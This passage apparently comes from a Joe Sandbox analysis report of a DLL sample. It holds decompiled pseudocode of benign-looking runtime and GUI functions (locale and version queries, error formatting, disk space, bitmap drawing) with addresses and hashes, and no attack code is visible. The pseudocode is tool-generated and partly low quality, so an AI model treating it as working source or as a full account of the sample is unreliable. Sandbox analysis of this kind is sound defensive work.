					_push( *[fs:eax]);
					 *[fs:eax] = _t40;
					 *_t35 = E00719238(_v8, _t20,  *_t35, _t32, _t35, _t43);
					_pop(_t30);
					 *[fs:eax] = _t30;
					_push(E00716CA7);
					return E00703274(_v8);
				}
			}

0x00716c2d
0x00716c2f
0x00716c33
0x00716c35
0x00716c37
0x00716c3b
0x00716c3d
0x00716c3d
0x00716c55
0x00716c58
0x00716c5a
0x00716cae
0x00716c5c
0x00716c6d
0x00716c72
0x00716c73
0x00716c78
0x00716c7b
0x00716c88
0x00716c8c
0x00716c8f
0x00716c92
0x00716c9f
0x00716c9f

APIs

FindResourceA.KERNEL32(?,00000000,0000000A), ref: 00716C4E

Strings

Tq, xrefs: 00716C63

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: FindResource
String ID: Tq
API String ID: 1635176832-501501286
Opcode ID: 5c27a1bc27f8a32e70ad207f7df808fd31f99f9c0bbc6a3cccdd222b3f0e0658
Instruction ID: 7f90d53a87fcddd7111b8e54ce1d768a2eebad5565d9078d3a93a8ce10358263
Opcode Fuzzy Hash: 5c27a1bc27f8a32e70ad207f7df808fd31f99f9c0bbc6a3cccdd222b3f0e0658
Instruction Fuzzy Hash: 2A01F271304300EFE714EF6EEC92DAAB3EDEB8A710B514439F504D72D0EA79AD0182A0

Uniqueness

Uniqueness Score: -1.00%

Function 007210CC Relevance: 3.0, APIs: 2, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E007210CC(void* __ebx) {
				char _v260;
				char _v264;
				long _t21;
				void* _t22;
				intOrPtr _t27;
				void* _t32;

				_v264 = 0;
				_push(_t32);
				_push(0x721168);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32 + 0xfffffefc;
				_t21 = GetLastError();
				if(_t21 == 0 || FormatMessageA(0x1000, 0, _t21, 0x400,  &_v260, 0x100, 0) == 0) {
					E00721078(_t22);
				} else {
					E007042D8( &_v264, 0x100,  &_v260);
					L0070B904(_v264, 1);
					L00703A00();
				}
				_pop(_t27);
				 *[fs:eax] = _t27;
				_push(E0072116F);
				return E00704068( &_v264);
			}

0x007210d8
0x007210e0
0x007210e1
0x007210e6
0x007210e9
0x007210f1
0x007210f5
0x0072114a
0x0072111b
0x0072112c
0x0072113e
0x00721143
0x00721143
0x00721151
0x00721154
0x00721157
0x00721167

APIs

GetLastError.KERNEL32(00000000,00721168), ref: 007210EC
FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,00721168), ref: 00721112

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: aad47a93a375f05d537afc5f738fe27685821327ce061d4157360cd359d48472
Instruction ID: 4e8253d2616160a9fb7e23adfb560ec3f024faf034c981c317d52fc22c216866
Opcode Fuzzy Hash: aad47a93a375f05d537afc5f738fe27685821327ce061d4157360cd359d48472
Instruction Fuzzy Hash: 3E01F7B0304359DFD721EB609C92BEA73ECF728700F8140B0B745D62C1EAF86D908920

Uniqueness

Uniqueness Score: -1.00%

Function 0070C804 Relevance: 3.0, APIs: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0070C804(int __eax, void* __ebx, void* __eflags) {
				char _v11;
				char _v16;
				intOrPtr _t28;
				void* _t31;
				void* _t33;

				_t33 = __eflags;
				_v16 = 0;
				_push(_t31);
				_push(0x70c868);
				_push( *[fs:edx]);
				 *[fs:edx] = _t31 + 0xfffffff4;
				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
				E007042D8( &_v16, 7,  &_v11);
				_push(_v16);
				E007083E8(7, GetACP(), _t33);
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E0070C86F);
				return E00704068( &_v16);
			}

0x0070c804
0x0070c80d
0x0070c812
0x0070c813
0x0070c818
0x0070c81b
0x0070c82a
0x0070c83a
0x0070c842
0x0070c84b
0x0070c854
0x0070c857
0x0070c85a
0x0070c867

APIs

GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0070C868), ref: 0070C82A
GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0070C868), ref: 0070C843

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 7a10d89a70fb9e6efa25686f05cd5b7160d171c85370c53fadc564e192808c6b
Instruction ID: aa9427080524117dcd9b048daa6bf2997e21e665c0e69613c0fe3b68098e455a
Opcode Fuzzy Hash: 7a10d89a70fb9e6efa25686f05cd5b7160d171c85370c53fadc564e192808c6b
Instruction Fuzzy Hash: 9AF09071E08308FBEB05EBE1CC6699EB3EEEBC5B14F40C675B610A66C1EA7C65108750

Uniqueness

Uniqueness Score: -1.00%

Function 00708912 Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00708912(CHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				signed int _v28;
				CHAR* _t25;
				int _t26;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr* _t39;
				intOrPtr* _t40;
				intOrPtr _t48;
				intOrPtr _t50;

				_t25 = _a4;
				if(_t25 == 0) {
					_t25 = 0;
				}
				_t26 = GetDiskFreeSpaceA(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
				_v28 = _v8 * _v12;
				_v24 = 0;
				_t48 = _v24;
				_t31 = E00704E90(_v28, _t48, _v16, 0);
				_t39 = _a8;
				 *_t39 = _t31;
				 *((intOrPtr*)(_t39 + 4)) = _t48;
				_t50 = _v24;
				_t34 = E00704E90(_v28, _t50, _v20, 0);
				_t40 = _a12;
				 *_t40 = _t34;
				 *((intOrPtr*)(_t40 + 4)) = _t50;
				return _t26;
			}

0x0070891b
0x00708920
0x00708922
0x00708922
0x00708935
0x00708944
0x00708947
0x00708954
0x00708957
0x0070895c
0x0070895f
0x00708961
0x0070896e
0x00708971
0x00708976
0x00708979
0x0070897b
0x00708984

APIs

GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 00708935

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: DiskFreeSpace
String ID:
API String ID: 1705453755-0
Opcode ID: a6447be563f94fa06700d01bc4f40152254d1f92233d94cffa8446011941e948
Instruction ID: 91a169c2a67de10e051b508accbb3d28a5713413625d3a1833c26d5f36b6c5ad
Opcode Fuzzy Hash: a6447be563f94fa06700d01bc4f40152254d1f92233d94cffa8446011941e948
Instruction Fuzzy Hash: 4211BEB5A00209EFDB44DF99C8819AFB7F9FFC8310B54C569A505E7254E6319E018B90

Uniqueness

Uniqueness Score: -1.00%

Function 0072A41C Relevance: 1.5, APIs: 1, Instructions: 41
nativeCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E0072A41C(intOrPtr __eax, intOrPtr* __edx) {
				intOrPtr _v8;
				intOrPtr _t12;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;

				_v8 = __eax;
				_t22 =  *__edx;
				_t26 = _t22 - 0x113;
				if(_t22 != 0x113) {
					_push( *((intOrPtr*)(__edx + 8)));
					_push( *((intOrPtr*)(__edx + 4)));
					_push(_t22);
					_t12 =  *((intOrPtr*)(_v8 + 0x34));
					_push(_t12);
					L007067F0();
					 *((intOrPtr*)(__edx + 0xc)) = _t12;
					return _t12;
				}
				_push(0x72a456);
				_push( *[fs:eax]);
				 *[fs:eax] = _t25;
				E00703470(_v8, _t26);
				_pop(_t21);
				 *[fs:eax] = _t21;
				return 0;
			}

0x0072a425
0x0072a428
0x0072a42a
0x0072a430
0x0072a474
0x0072a478
0x0072a479
0x0072a47d
0x0072a480
0x0072a481
0x0072a486
0x00000000
0x0072a486
0x0072a435
0x0072a43a
0x0072a43d
0x0072a447
0x0072a44e
0x0072a451
0x00000000

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0072A481

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: 360dc9c1b48b83360bb9ecac6c274a4009195a4449eb06ecfd31b890eab65316
Instruction ID: 5ced122b60562a8068c237869b7cbf45925807dd12572ac6390acc5c40f634df
Opcode Fuzzy Hash: 360dc9c1b48b83360bb9ecac6c274a4009195a4449eb06ecfd31b890eab65316
Instruction Fuzzy Hash: B2F09076604254FF9B00DF9EE896CA6B7ECEB4972075180B6FD08D7651D279ED008B70

Uniqueness

Uniqueness Score: -1.00%

Function 0072165C Relevance: 1.5, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0072165C(intOrPtr __eax, intOrPtr __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v48;
				struct _SYSTEM_INFO* _t17;
				unsigned int _t20;
				unsigned int _t22;
				signed int _t31;
				intOrPtr _t33;

				_v12 = __edx;
				_v8 = __eax;
				_t17 =  &_v48;
				GetSystemInfo(_t17);
				_t33 = _v8;
				_t31 = _v12 - 1;
				if(_t31 >= 0) {
					if( *((short*)( &_v48 + 0x20)) == 3) {
						do {
							_t20 =  *(_t33 + _t31 * 4) >> 0x10;
							 *(_t33 + _t31 * 4) = _t20;
							_t31 = _t31 - 1;
						} while (_t31 >= 0);
						return _t20;
					} else {
						goto L2;
					}
					do {
						L2:
						asm("bswap eax");
						_t22 =  *(_t33 + _t31 * 4) >> 8;
						 *(_t33 + _t31 * 4) = _t22;
						_t31 = _t31 - 1;
					} while (_t31 >= 0);
					return _t22;
				}
				return _t17;
			}

0x00721662
0x00721665
0x00721668
0x0072166c
0x00721671
0x00721677
0x00721678
0x00721682
0x00721695
0x0072169e
0x007216a6
0x007216a9
0x007216a9
0x00000000
0x00000000
0x00000000
0x00000000
0x00721684
0x00721684
0x00721687
0x00721689
0x0072168c
0x0072168f
0x0072168f
0x00000000
0x00721684
0x007216b0

APIs

GetSystemInfo.KERNEL32(?), ref: 0072166C

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: ee41f5a3d9cb6b8ca3ff05be9b8e7385d3ae08243e7db83de66892b642c58b34
Instruction ID: 5a2bbd704c3aad3b3bd67350b5e07b2d189e6f7beb42d0878bb7366a4e5591d9
Opcode Fuzzy Hash: ee41f5a3d9cb6b8ca3ff05be9b8e7385d3ae08243e7db83de66892b642c58b34
Instruction Fuzzy Hash: 8FF09071E01119DFCB10DF98D4888DCBBB4FB66311B99429AD404EB342EF39A695CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0070B148 Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0070B148(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				char _v260;
				int _t5;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				_t5 = GetLocaleInfoA(__eax, __edx,  &_v260, 0x100);
				_t19 = _t5;
				if(_t5 <= 0) {
					return E007040BC(_t10, _t18);
				}
				return E00704158(_t10, _t5 - 1,  &_v260, _t19);
			}

0x0070b153
0x0070b155
0x0070b166
0x0070b16b
0x0070b16d
0x00000000
0x0070b185
0x00000000

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0070B166

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: b6f1d3273fc3b6786132ddf740d69232e68c3821d2a2d61da1dcad8ee581b7aa
Instruction ID: f30c03d6819a4a05b8fb7daab65cf875c66b49f34ca6d58cb37d2f3d51fcadca
Opcode Fuzzy Hash: b6f1d3273fc3b6786132ddf740d69232e68c3821d2a2d61da1dcad8ee581b7aa
Instruction Fuzzy Hash: BDE0D872B04218E7D714A65C4C96AF6B2DCEB5C310F00437EBE04D73C2EEA49E9446E6

Uniqueness

Uniqueness Score: -1.00%

Function 0070C10C Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0070C10C() {
				char _v128;
				intOrPtr _v132;
				signed int _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				int _t7;
				struct _OSVERSIONINFOA* _t18;

				_t18->dwOSVersionInfoSize = 0x94;
				_t7 = GetVersionExA(_t18);
				if(_t7 != 0) {
					 *0x76c0d4 = _v132;
					 *0x76c0d8 = _v144;
					 *0x76c0dc = _v140;
					if( *0x76c0d4 != 1) {
						 *0x76c0e0 = _v136;
					} else {
						 *0x76c0e0 = _v136 & 0x0000ffff;
					}
					return E007042D8(0x76c0e4, 0x80,  &_v128);
				}
				return _t7;
			}

0x0070c112
0x0070c11a
0x0070c121
0x0070c127
0x0070c130
0x0070c139
0x0070c145
0x0070c15b
0x0070c147
0x0070c150
0x0070c150
0x00000000
0x0070c16e
0x0070c179

APIs

GetVersionExA.KERNEL32(?,0070D930,00000000,0070D948), ref: 0070C11A

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: de1cd5e72f9a71c8aff64dec6b7a5651e97cd684dc5acac9cff25cc6354d04e4
Instruction ID: 8bd88154de8bef78810f2a01f52ab34964faefcf89d0f69b59b83d73918fd089
Opcode Fuzzy Hash: de1cd5e72f9a71c8aff64dec6b7a5651e97cd684dc5acac9cff25cc6354d04e4
Instruction Fuzzy Hash: 36F017B4948345DFC302DF28DD4162577E0BB48350F008A29F9EAC7391E77CD8048B5A

Uniqueness

Uniqueness Score: -1.00%

Function 0070B194 Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0070B194(int __eax, char __ecx, int __edx) {
				char _v16;
				char _t5;
				char _t6;

				_push(__ecx);
				_t6 = __ecx;
				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t6;
				} else {
					_t5 = _v16;
				}
				return _t5;
			}

0x0070b197
0x0070b198
0x0070b1ae
0x0070b1b5
0x0070b1b0
0x0070b1b0
0x0070b1b0
0x0070b1bb

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0070CB16,00000000,0070CD2F,?,?,00000000,00000000), ref: 0070B1A7

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: bd271c67a8736d88d9c6bc7ad2ed21b3b8530ccc7d2e7f1ac70b319964d8341f
Instruction ID: 552799375b7b3ae1f1d8111522a387fba9db334a6b3d9ea706c29f19ab3b7594
Opcode Fuzzy Hash: bd271c67a8736d88d9c6bc7ad2ed21b3b8530ccc7d2e7f1ac70b319964d8341f
Instruction Fuzzy Hash: 17D05E7630D254AAE214565A2DA5DBB8ADCCAC97A0F104239B648C6282D3048C0693B1

Uniqueness

Uniqueness Score: -1.00%

Function 007284AC Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E007284AC(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				intOrPtr _t91;
				void* _t103;
				void* _t116;
				void* _t132;
				void* _t162;
				void* _t164;
				void* _t168;
				void* _t169;
				intOrPtr _t188;
				void* _t211;
				void* _t218;
				intOrPtr _t219;
				void* _t222;

				_t215 = __esi;
				_push(__esi);
				_v52 = 0;
				_v36 = 0;
				_v12 = __edx;
				_v8 = __eax;
				_push(_t222);
				_push(0x7286b1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t222 + 0xffffffd0;
				_v20 = 0;
				_t211 = 0;
				if(__ecx != 0) {
					E007040BC(_v8 + 0x24, __ecx);
				}
				_t91 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x10)) + 8));
				if(_t91 <= 0) {
					L26:
					_pop(_t188);
					 *[fs:eax] = _t188;
					_push(0x7286b8);
					E00704068( &_v52);
					return E00704068( &_v36);
				} else {
					_t162 = _t91 - 1;
					if(_t162 < 0) {
						L8:
						if(_t211 == 0) {
							_v48 = E00704528(_v12);
							_v44 = 6;
							L0070B9FC(_t162, 0x727ed0, 1, _t211, _t215, 0,  &_v48);
							L00703A00();
						}
						if(_t211 == 1) {
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(L007278AC( *((intOrPtr*)(_v8 + 0x10)), _v20) + 4)))) + 0x20))();
						}
						if(_t211 - 1 <= 0) {
							goto L26;
						} else {
							_v24 = E00703244(1);
							_t164 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x10)) + 8)) - 1;
							if(_t164 < 0) {
								L21:
								if( *((intOrPtr*)(_v8 + 0xc)) == 0) {
									_t103 =  *((intOrPtr*)( *_v24 + 0x18))();
									 *((intOrPtr*)( *_v24 + 0xc))();
									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 + 4)))) + 0x20))();
								} else {
									 *((intOrPtr*)( *_v24 + 0x90))();
									if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xc)))) + 0xc))() >= 0) {
										_t116 =  *((intOrPtr*)( *_v24 + 0x18))();
										 *((intOrPtr*)( *_v24 + 0xc))();
										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t116 + 4)))) + 0x20))();
									}
								}
								E00703274(_v24);
								goto L26;
							}
							_t168 = _t164 + 1;
							_t218 = 0;
							do {
								_v32 = L007278AC( *((intOrPtr*)(_v8 + 0x10)), _t218);
								if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v32 + 4)))) + 0x10))() <= 0) {
									goto L20;
								}
								_v28 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v32 + 4)))) + 0x14))();
								_t132 =  *((intOrPtr*)( *_v28 + 0x14))() - 1;
								if(_t132 < 0) {
									L19:
									E00703274(_v28);
									goto L20;
								}
								_v40 = _t132 + 1;
								_v16 = 0;
								do {
									 *((intOrPtr*)( *_v28 + 0xc))();
									 *((intOrPtr*)( *_v24 + 0x3c))();
									_v16 = _v16 + 1;
									_t56 =  &_v40;
									 *_t56 = _v40 - 1;
								} while ( *_t56 != 0);
								goto L19;
								L20:
								_t218 = _t218 + 1;
								_t168 = _t168 - 1;
							} while (_t168 != 0);
							goto L21;
						}
					}
					_t169 = _t162 + 1;
					_t219 = 0;
					do {
						if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(L007278AC( *((intOrPtr*)(_v8 + 0x10)), _t219) + 4)))) + 0x10))() > 0) {
							_v20 = _t219;
							_t211 = _t211 + 1;
						}
						_t219 = _t219 + 1;
						_t169 = _t169 - 1;
					} while (_t169 != 0);
					goto L8;
				}
			}

0x007284ac
0x007284b3
0x007284b7
0x007284ba
0x007284bf
0x007284c2
0x007284c7
0x007284c8
0x007284cd
0x007284d0
0x007284d5
0x007284d8
0x007284dc
0x007284e6
0x007284e6
0x007284f1
0x007284f6
0x00728693
0x00728695
0x00728698
0x0072869b
0x007286a3
0x007286b0
0x007284fc
0x007284fe
0x00728501
0x0072852a
0x0072852c
0x00728536
0x00728539
0x0072854f
0x00728554
0x00728554
0x0072855c
0x00728574
0x00728574
0x00728578
0x00000000
0x0072857e
0x0072858a
0x00728596
0x00728599
0x00728619
0x00728620
0x0072866e
0x0072867d
0x00728688
0x00728622
0x00728627
0x0072863f
0x00728648
0x00728657
0x00728662
0x00728662
0x0072863f
0x0072868e
0x00000000
0x0072868e
0x0072859b
0x0072859c
0x0072859e
0x007285ab
0x007285be
0x00000000
0x00000000
0x007285ce
0x007285d9
0x007285dc
0x0072860d
0x00728610
0x00000000
0x00728610
0x007285df
0x007285e2
0x007285e9
0x007285f4
0x00728602
0x00728605
0x00728608
0x00728608
0x00728608
0x00000000
0x00728615
0x00728615
0x00728616
0x00728616
0x00000000
0x0072859e
0x00728578
0x00728503
0x00728504
0x00728506
0x00728520
0x00728522
0x00728525
0x00728525
0x00728526
0x00728527
0x00728527
0x00000000
0x00728506

Strings

|Qq, xrefs: 00728580

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID:
String ID: |Qq
API String ID: 0-638084505
Opcode ID: 36c4fc6b8065c717fd27b534cceaa6b352365f50eb41d65bfa7be9bde660db84
Instruction ID: bebf48768cb6cf53d598b2de78eb2883df36f6b1f0d0ebe098453d5dfb55a81f
Opcode Fuzzy Hash: 36c4fc6b8065c717fd27b534cceaa6b352365f50eb41d65bfa7be9bde660db84
Instruction Fuzzy Hash: C0710574A00219DFCB04DFA9D58899EB7F1FF48310B2582A5E905EB362DB35ED06CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00721174 Relevance: .0, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00721174(void* __eax) {
				void* __ebx;
				void* _t4;

				_t4 = __eax;
				if(__eax == 0) {
					E007210CC(__eax);
				}
				return _t4;
			}

0x00721175
0x00721179
0x0072117b
0x0072117b
0x00721183

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 39b41b70695c454327eb0993d5023a58a29fd598f34c2b017cd8f3f65892f761
Instruction ID: 717ee782a6f35b2b2cdc5171fe76a50187648247f97ee86828879e13d2a76058
Opcode Fuzzy Hash: 39b41b70695c454327eb0993d5023a58a29fd598f34c2b017cd8f3f65892f761
Instruction Fuzzy Hash: C2A022E030232F833B2038EE3CC000280CCBB382083C00238F300C3202EE8ACC280022

Uniqueness

Uniqueness Score: -1.00%

Function 00721318 Relevance: 37.7, APIs: 25, Instructions: 248
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 52%

			E00721318(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, int _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) {
				int _v8;
				int _v12;
				char _v13;
				struct HDC__* _v20;
				void* _v24;
				void* _v28;
				long _v32;
				long _v36;
				intOrPtr _v40;
				intOrPtr* _t78;
				intOrPtr _t87;
				struct HDC__* _t88;
				intOrPtr _t91;
				struct HDC__* _t92;
				struct HDC__* _t135;
				int _t162;
				intOrPtr _t169;
				intOrPtr _t171;
				struct HDC__* _t173;
				int _t175;
				void* _t177;
				void* _t178;
				intOrPtr _t179;

				_t177 = _t178;
				_t179 = _t178 + 0xffffffdc;
				_v12 = __ecx;
				_v8 = __edx;
				_t173 = __eax;
				_t175 = _a16;
				_t162 = _a20;
				_v13 = 1;
				_t78 =  *0x76e30c; // 0x76c0d4
				if( *_t78 != 2 || _t162 != _a40 || _t175 != _a36) {
					_v40 = 0;
					_push(0);
					L00706590();
					_v20 = E00721174(0);
					_push(_t177);
					_push(0x721598);
					_push( *[fs:eax]);
					 *[fs:eax] = _t179;
					_push(_t175);
					_push(_t162);
					_push(_a32);
					L00706588();
					_v24 = E00721174(_a32);
					_v28 = SelectObject(_v20, _v24);
					_push(0);
					_t87 =  *0x76f894; // 0x5e0805c0
					_push(_t87);
					_t88 = _a32;
					_push(_t88);
					L007066F0();
					_v40 = _t88;
					_push(0);
					_push(_v40);
					_push(_a32);
					L007066F0();
					if(_v40 == 0) {
						_push(0xffffffff);
						_t91 =  *0x76f894; // 0x5e0805c0
						_push(_t91);
						_t92 = _v20;
						_push(_t92);
						L007066F0();
						_v40 = _t92;
					} else {
						_push(0xffffffff);
						_push(_v40);
						_t135 = _v20;
						_push(_t135);
						L007066F0();
						_v40 = _t135;
					}
					_push(_v20);
					L007066C8();
					StretchBlt(_v20, 0, 0, _t162, _t175, _a12, _a8, _a4, _t162, _t175, 0xcc0020);
					StretchBlt(_v20, 0, 0, _t162, _t175, _a32, _a28, _a24, _t162, _t175, 0x440328);
					_v32 = SetTextColor(_t173, 0);
					_v36 = SetBkColor(_t173, 0xffffff);
					StretchBlt(_t173, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t162, _t175, 0x8800c6);
					StretchBlt(_t173, _v8, _v12, _a40, _a36, _v20, 0, 0, _t162, _t175, 0x660046);
					SetTextColor(_t173, _v32);
					SetBkColor(_t173, _v36);
					if(_v28 != 0) {
